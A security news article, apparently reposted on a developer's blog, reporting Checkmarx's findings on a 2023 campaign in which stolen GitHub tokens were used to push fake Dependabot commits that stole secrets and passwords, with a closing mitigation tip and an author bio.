In an alarming incident, hackers have been infiltrating GitHub accounts and disguising their malicious code as Dependabot contributions. Their objective is to steal authentication secrets and passwords from developers.

This campaign took place in July 2023 when researchers noticed unusual commits on numerous public and private repositories. These commits were cleverly crafted to appear as Dependabot commits.

Dependabot is an automated tool provided by GitHub that scans projects for vulnerable dependencies and automatically generates pull requests to update them.

According to a report by Checkmarx, the fake Dependabot contributions were made possible through stolen GitHub access tokens. The attackers aimed to inject malicious code into projects to retrieve the secrets of these projects.

Impersonating GitHub’s Dependabot

The attack began with the hackers somehow acquiring the personal GitHub access tokens of their targets, but Checkmarx does not have insight into how this was done.

The threat actors then utilized automated scripts to create fake commit messages titled “fix” under the user account “dependabot[bot].”

These fraudulent commits introduced malicious code into the project, performing the following actions:

  1. Extracting secrets from the targeted GitHub project and sending them to the attacker’s command and control server.
  2. Modifying existing JavaScript files in the breached repository to inject malware that steals passwords from web-form submissions and sends them to the same command and control address.

The secrets extraction is accomplished by adding the GitHub action file “hook.yml” as a new workflow that is triggered with every code push event on the affected repository.

Example of the malicious commit (Checmarx)

The password-stealer component injects obfuscated JavaScript code at the end of all JavaScript (.js) files, loading a script from a remote site. This script monitors form submissions to steal passwords from any form inputs of type ‘password.’

Password stealing code
Password stealing code invoked by the modified JS files (Checkmarx)

Since many compromised tokens also provided access to private repositories, both public and private GitHub repositories were affected by this attack.

Possible compromise points

Checkmarx’s analysts examined the logs from some victims and discovered that their accounts were compromised through stolen PATs (personal access tokens).

These tokens are stored locally on the developers’ computers and allow them to log in to GitHub without going through the 2FA (two-factor authentication) process.

“Unfortunately, the token’s access log activity does not appear in the account’s audit log. Therefore, if your token has been compromised, you cannot be certain as the access logs are missing,” warns Checkmarx.

The attack chain
The attack chain (Checkmarx)

Although the cybersecurity firm has not reached a definitive conclusion regarding the exact means by which the attackers stole these tokens, they speculate that it might have been through a malware infection, possibly introduced to the developers’ devices via a malicious package.

Most of the compromised users are from Indonesia, suggesting a targeted attack tailored to this demographic. However, the available evidence does not provide specific details about the motive.

A suggested measure to protect against these attacks is to switch to GitHub’s fine-grained personal access tokens, which limit users to specific permissions, thereby reducing risks in the event of compromise.


Full Stack Developer

About the Author

I’m passionate about web development and design in all its forms, helping small businesses build and improve their online presence. I spend a lot of time learning new techniques and actively helping other people learn web development through a variety of help groups and writing tutorials for my blog about advancements in web design and development.

View Articles